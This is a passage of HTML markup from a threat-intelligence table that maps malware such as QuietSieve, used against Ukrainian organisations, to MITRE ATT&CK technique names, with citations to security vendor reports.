href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[4]</span></a><a href="https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[5]</span></a><a href="https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/"><span 
style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[8]</span></a><a href="https://www.secureworks.com/research/threat-profiles/iron-tilden"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[7]</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1071"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Application Layer Protocol</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1071/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Web Protocols</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; 
vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1547"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Boot or Logon Autostart Execution</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1547/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Registry Run Keys / Startup Folder</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1059"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Command and Scripting Interpreter</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1059/003"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: 
normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Windows Command Shell</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1059"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Command and Scripting Interpreter</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1059/005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Visual Basic</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1074"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Data Staged</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: 
normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1074/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Local Data Staging</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1140"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Deobfuscate/Decode Files or Information</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1041"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Exfiltration Over C2 Channel</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1083"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 
172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">File and Directory Discovery</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1070"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Indicator Removal</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1070/004"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">File Deletion</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1105"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Ingress Tool Transfer</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 
41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1106"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Native API</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1027"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Obfuscated Files or Information</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1027/007"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Dynamic API Resolution</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1053"><span style="font-size: 12pt; font-family: Arial, 
sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Scheduled Task/Job</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1053/005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Scheduled Task</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1113"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Screen Capture</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1218"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">System Binary Proxy Execution</span></a><span style="font-size: 12pt; font-family: Arial, 
sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1218/005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Mshta</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1218"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">System Binary Proxy Execution</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1218/011"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Rundll32</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1497"><span style="font-size: 12pt; 
font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Virtualization/Sandbox Evasion</span></a></p></td></tr><tr style="height:69.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/software/S0686"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">S0686</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/software/S0686"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">QuietSieve</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 
172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[5]</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1071"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Application Layer Protocol</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1071/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Web Protocols</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Data from Local System</span></a><span style="font-size: 12pt; font-family: 
Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1083"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">File and Directory Discovery</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1564"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Hide Artifacts</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1564/003"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Hidden Window</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1105"><span 
style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Ingress Tool Transfer</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1135"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Network Share Discovery</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1120"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Peripheral Device Discovery</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1113"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Screen Capture</span></a><span 
style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1016"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">System Network Configuration Discovery</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1016/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Internet Connection Discovery</span></a></p></td></tr></tbody></table></div></span></div><p style="line-height: 1.44; margin-top: 0pt; margin-bottom: 0pt; padding: 0pt 0pt 4pt;"><br></p><p style="line-height: 1.38; margin-top: 0pt; margin-bottom: 12pt;"><br></p></span></div><div><br></div><div><br></div>